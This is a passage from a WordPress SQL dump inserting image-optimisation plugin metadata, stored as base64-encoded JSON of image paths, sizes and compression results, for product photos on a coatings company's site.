2F0aW5nLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNjI1LCJpZCI6MTQwMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2Mmgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjJoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDYyaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTYyOCwiaWQiOjE0MDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjJoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYyaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2Mmgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE2MzAsImlkIjoxNDAyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYyaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2Mmgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjJoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNjMzLCJpZCI6MTQwMn1d'); 
INSERT INTO `wp_postmeta` VALUES (29541, 1401, 'wpfc_optimisation_reduction', '2160942'); 
INSERT INTO `wp_postmeta` VALUES (29542, 1401, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYwaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2MGgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmcuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2MGgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmcuanBnIiwicmVkdWN0aW9uIjoyMTYwNDc0LCJ0aW1lIjoxNDgzNTcxNjQ0LCJpZCI6IjE0MDEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2MGgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjBoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDYwaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTY0NywiaWQiOjE0MDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYwaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2MGgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjBoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNjUwLCJpZCI6MTQwMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjBoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYwaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2MGgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE2NTMsImlkIjoxNDAxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2MGgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYwaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDYwaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNjU2LCJpZCI6MTQwMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjBoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYwaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2MGgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE2NTksImlkIjoxNDAxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2MGgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjBoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDYwaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTY2MiwiaWQiOjE0MDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYwaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2MGgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjBoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNjY0LCJpZCI6MTQwMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjBoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYwaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2MGgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE2NjcsImlkIjoxNDAxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYwaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2MGgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjBoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxODIsInRpbWUiOjE0ODM1NzE2NjksImlkIjoxNDAxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYwaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2MGgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjBoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMjksInRpbWUiOjE0ODM1NzE2NzIsImlkIjoxNDAxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYwaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2MGgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjBoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxNDYsInRpbWUiOjE0ODM1NzE2NzUsImlkIjoxNDAxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYwaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2MGgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjBoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNjc3LCJpZCI6MTQwMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2MGgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjBoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDYwaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTY4MCwiaWQiOjE0MDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjBoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYwaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2MGgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE2ODMsImlkIjoxNDAxfV0='); 
INSERT INTO `wp_postmeta` VALUES (29543, 1400, 'wpfc_optimisation_reduction', '2368892'); 
INSERT INTO `wp_postmeta` VALUES (29544, 1400, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDUybi1wcm90ZWN0aXZlLXZhcm5pc2guanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NTJuLXByb3RlY3RpdmUtdmFybmlzaC5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDUybi1wcm90ZWN0aXZlLXZhcm5pc2guanBnIiwicmVkdWN0aW9uIjoyMzY4ODA5LCJ0aW1lIjoxNDgzNTcxNjk0LCJpZCI6IjE0MDAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ1Mm4tcHJvdGVjdGl2ZS12YXJuaXNoLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDUybi1wcm90ZWN0aXZlLXZhcm5pc2gtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NTJuLXByb3RlY3RpdmUtdmFybmlzaC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTY5NywiaWQiOjE0MDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDUybi1wcm90ZWN0aXZlLXZhcm5pc2gtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NTJuLXByb3RlY3RpdmUtdmFybmlzaC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ1Mm4tcHJvdGVjdGl2ZS12YXJuaXNoLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNzAwLCJpZCI6MTQwMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NTJuLXByb3RlY3RpdmUtdmFybmlzaC03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ1Mm4tcHJvdGVjdGl2ZS12YXJuaXNoLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDUybi1wcm90ZWN0aXZlLXZhcm5pc2gtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE3MDMsImlkIjoxNDAwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ1Mm4tcHJvdGVjdGl2ZS12YXJuaXNoLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ1Mm4tcHJvdGVjdGl2ZS12YXJuaXNoLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NTJuLXByb3RlY3RpdmUtdmFybmlzaC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNzA3LCJpZCI6MTQwMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NTJuLXByb3RlY3RpdmUtdmFybmlzaC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ1Mm4tcHJvdGVjdGl2ZS12YXJuaXNoLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDUybi1wcm90ZWN0aXZlLXZhcm5pc2gtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE3MDksImlkIjoxNDAwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd